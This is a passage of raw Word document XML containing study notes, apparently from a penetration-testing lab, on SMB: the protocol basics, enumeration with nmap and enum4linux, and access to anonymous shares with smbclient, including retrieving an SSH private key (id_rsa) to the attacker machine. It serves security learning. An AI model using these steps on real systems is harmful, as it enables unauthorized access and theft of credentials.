        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>maintain octet structures with prepended 0’s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53687A58" w14:textId="1846DAFF" w:rsidR="007E5776" w:rsidRPr="0084205E" w:rsidRDefault="007E5776" w:rsidP="0084205E">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="72180F3B" w14:textId="39F091B5" w:rsidR="007E5776" w:rsidRPr="0084205E" w:rsidRDefault="007E5776" w:rsidP="0084205E">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Network Service – learn about, then enumerate and exploit a variety of network services and misconfigurations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D12901D" w14:textId="130C57B0" w:rsidR="007E5776" w:rsidRPr="0084205E" w:rsidRDefault="00C843F7" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Understanding SMB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B8CA87E" w14:textId="54A4E6D0" w:rsidR="00C843F7" w:rsidRPr="0084205E" w:rsidRDefault="00C843F7" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Server Message Block Protocol – client-server communication protocol used for sharing access to files, printers, serial ports, and other network resources</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55379965" w14:textId="215B4774" w:rsidR="00C843F7" w:rsidRPr="0084205E" w:rsidRDefault="00C843F7" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Response-request protocol = transmits multiple messages between client and server to establish connection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45D0EFAD" w14:textId="7CC0C6AF" w:rsidR="000C3C93" w:rsidRPr="0084205E" w:rsidRDefault="000C3C93" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Connect via NetBIOS over TCP/IP [RFC1001&amp;RFC1002], NetBEUI, or IPX/SPX</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A9333EB" w14:textId="362F5EB3" w:rsidR="000C3C93" w:rsidRPr="0084205E" w:rsidRDefault="000C3C93" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Once connection is established, clients send commands (SMBs) to server to allow access shares</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5250DC3C" w14:textId="53BCD3C9" w:rsidR="000C3C93" w:rsidRPr="0084205E" w:rsidRDefault="000C3C93" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Done over the network</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E159586" w14:textId="39676EAC" w:rsidR="000C3C93" w:rsidRPr="0084205E" w:rsidRDefault="000C3C93" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Windows and Samba (Unix) support SMB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="500D8E75" w14:textId="2BF2890F" w:rsidR="000C3C93" w:rsidRPr="0084205E" w:rsidRDefault="000C3C93" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Enumerating SMB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1280E170" w14:textId="0AD50DA3" w:rsidR="000C3C93" w:rsidRPr="0084205E" w:rsidRDefault="000C3C93" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">Process of gathering information on a target </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>in order to</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> find potential attack vectors and aid in exploitation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A78E0E3" w14:textId="3C2540A3" w:rsidR="003E4E50" w:rsidRPr="0084205E" w:rsidRDefault="003E4E50" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Avoid ineffective or overtly destructive attacks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C2D7657" w14:textId="320238B0" w:rsidR="003E4E50" w:rsidRPr="0084205E" w:rsidRDefault="003E4E50" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Gather passwords, usernames, network info, hostnames, application data, servers, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A459693" w14:textId="037E9071" w:rsidR="003E4E50" w:rsidRPr="0084205E" w:rsidRDefault="003E4E50" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Port Scanning</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2977E8F0" w14:textId="67F0D653" w:rsidR="003E4E50" w:rsidRPr="0084205E" w:rsidRDefault="003E4E50" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>First step in enumeration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D5B18ED" w14:textId="1AF59A83" w:rsidR="003E4E50" w:rsidRPr="0084205E" w:rsidRDefault="003E4E50" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:lastRenderedPageBreak/>
        <w:t>Find out info about services, applications, structure, OS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B355201" w14:textId="57F23A75" w:rsidR="003E4E50" w:rsidRPr="0084205E" w:rsidRDefault="003E4E50" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Nmap -A -p- flags</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D3E3749" w14:textId="41ECA7AC" w:rsidR="003E4E50" w:rsidRPr="0084205E" w:rsidRDefault="003E4E50" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Enum4Linux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EE942EF" w14:textId="52D95AF2" w:rsidR="003E4E50" w:rsidRPr="0084205E" w:rsidRDefault="003E4E50" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Used to enumerate SMB shares on both Linux and Windows</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7782DCA3" w14:textId="540433C1" w:rsidR="003E4E50" w:rsidRPr="0084205E" w:rsidRDefault="003E4E50" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Wrapper around tools in Samba package enabling quick extraction of information from target pertaining to SMB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40424589" w14:textId="2C73B48A" w:rsidR="003E4E50" w:rsidRPr="0084205E" w:rsidRDefault="003E4E50" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Syntax: enum4linux [options] &lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DE1E60D" w14:textId="115A45D1" w:rsidR="003E4E50" w:rsidRPr="0084205E" w:rsidRDefault="003E4E50" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>TAGS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F351A26" w14:textId="585C7E0F" w:rsidR="003E4E50" w:rsidRPr="0084205E" w:rsidRDefault="003E4E50" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>-U – get user list</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A551E8F" w14:textId="6F5CE654" w:rsidR="003E4E50" w:rsidRPr="0084205E" w:rsidRDefault="003E4E50" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>-M – get machine list</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59FD1F66" w14:textId="2C87EDD8" w:rsidR="003E4E50" w:rsidRPr="0084205E" w:rsidRDefault="003E4E50" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>-N – get name list dump</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75BC54AD" w14:textId="5C60B4B0" w:rsidR="003E4E50" w:rsidRPr="0084205E" w:rsidRDefault="003E4E50" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>-S – get share list</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0500B874" w14:textId="029D5873" w:rsidR="003E4E50" w:rsidRPr="0084205E" w:rsidRDefault="003E4E50" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>-P – get password policy information</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6956E4C7" w14:textId="649211A1" w:rsidR="003E4E50" w:rsidRPr="0084205E" w:rsidRDefault="003E4E50" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>-G – get group and member list</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52BB400E" w14:textId="77954958" w:rsidR="003E4E50" w:rsidRPr="0084205E" w:rsidRDefault="003E4E50" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">- A – </w:t>
      </w:r>
      <w:r w:rsidR="00961287" w:rsidRPr="0084205E">
        <w:t>all</w:t>
      </w:r>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> the above</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="352BB925" w14:textId="503B5822" w:rsidR="00053EA1" w:rsidRPr="0084205E" w:rsidRDefault="00053EA1" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Search for share enumeration on &lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FB0F6A2" w14:textId="69DBEBA3" w:rsidR="00053EA1" w:rsidRPr="0084205E" w:rsidRDefault="00053EA1" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Exploiting SMB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34EBB3EB" w14:textId="759D4EA7" w:rsidR="00053EA1" w:rsidRPr="0084205E" w:rsidRDefault="00053EA1" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Some exploits for SMB – like CVE-2017-7494</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EDF40EC" w14:textId="7CCB7F8C" w:rsidR="00053EA1" w:rsidRPr="0084205E" w:rsidRDefault="00053EA1" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Misconfiguration more likely path to success</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25E907E3" w14:textId="42415249" w:rsidR="00053EA1" w:rsidRPr="0084205E" w:rsidRDefault="00053EA1" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Anonymous SMB share access – common misconfiguration that allows gain information to deploy shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EFE969B" w14:textId="6A7100B8" w:rsidR="00053EA1" w:rsidRPr="0084205E" w:rsidRDefault="00053EA1" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Method</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C358018" w14:textId="5C459209" w:rsidR="00053EA1" w:rsidRPr="0084205E" w:rsidRDefault="00053EA1" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>From enumeration – gained – SMB share location + name of potential SMB share</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="740055FB" w14:textId="4484BADC" w:rsidR="00053EA1" w:rsidRPr="0084205E" w:rsidRDefault="00053EA1" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>SMBClient</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="33015C32" w14:textId="15C70AED" w:rsidR="00053EA1" w:rsidRPr="0084205E" w:rsidRDefault="00053EA1" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Part of samba suite</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FFADB3A" w14:textId="28FD71F6" w:rsidR="00053EA1" w:rsidRPr="0084205E" w:rsidRDefault="00053EA1" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">Syntax: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>smbclient</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> //[IP]/[SHARE]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E09BDFD" w14:textId="76D6794B" w:rsidR="00053EA1" w:rsidRPr="0084205E" w:rsidRDefault="00053EA1" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Tags: -U [name] (specify the user); -p [port] (specify the port)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CF82B7C" w14:textId="3969149A" w:rsidR="00053EA1" w:rsidRPr="0084205E" w:rsidRDefault="00053EA1" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">Ex. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>Smbclient</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> //10.10.10.2</w:t>
      </w:r>
      <w:r w:rsidR="00262A2B" w:rsidRPr="0084205E">
        <w:t>/secret -U suit -p 139</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F48390E" w14:textId="74FFD907" w:rsidR="00262A2B" w:rsidRPr="0084205E" w:rsidRDefault="00262A2B" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Username: Anonymous, no password needed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1635C7BF" w14:textId="4A9F0DC3" w:rsidR="00262A2B" w:rsidRPr="0084205E" w:rsidRDefault="00262A2B" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Ex. //10.10.54.11/profiles -U Anonymous -p 139</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52DFD7D1" w14:textId="350B03D9" w:rsidR="00262A2B" w:rsidRPr="0084205E" w:rsidRDefault="00262A2B" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>When password is request, press ENTER</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="029F680A" w14:textId="4E53D703" w:rsidR="00262A2B" w:rsidRPr="0084205E" w:rsidRDefault="00262A2B" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>If “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>smb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>: \&gt;”, success</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="016C611D" w14:textId="17D5FE1C" w:rsidR="002E719D" w:rsidRPr="0084205E" w:rsidRDefault="002E719D" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Use “ls” for list, items with “D” are directories and can be accessed via “cd”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="688221DE" w14:textId="07822775" w:rsidR="00262A2B" w:rsidRPr="0084205E" w:rsidRDefault="002E719D" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Once interesting files are found, use get “[file of interest]” &lt;output file name&gt; to transfer to attacker system and read via “cat” command</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27305838" w14:textId="3C6C1643" w:rsidR="002E719D" w:rsidRPr="0084205E" w:rsidRDefault="002E719D" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>“</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>id</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>_rsa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>” is the default name of an SSH identity file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="199EE33B" w14:textId="56D9E64C" w:rsidR="002E719D" w:rsidRPr="0084205E" w:rsidRDefault="002E719D" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">Retrieve with “get </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>id_rsa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00396CC4" w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> &lt;output file name&gt;”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0064C8D5" w14:textId="012C8F39" w:rsidR="00396CC4" w:rsidRPr="0084205E" w:rsidRDefault="00396CC4" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">Check public key for potential usernames anchored to end of file and use for </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
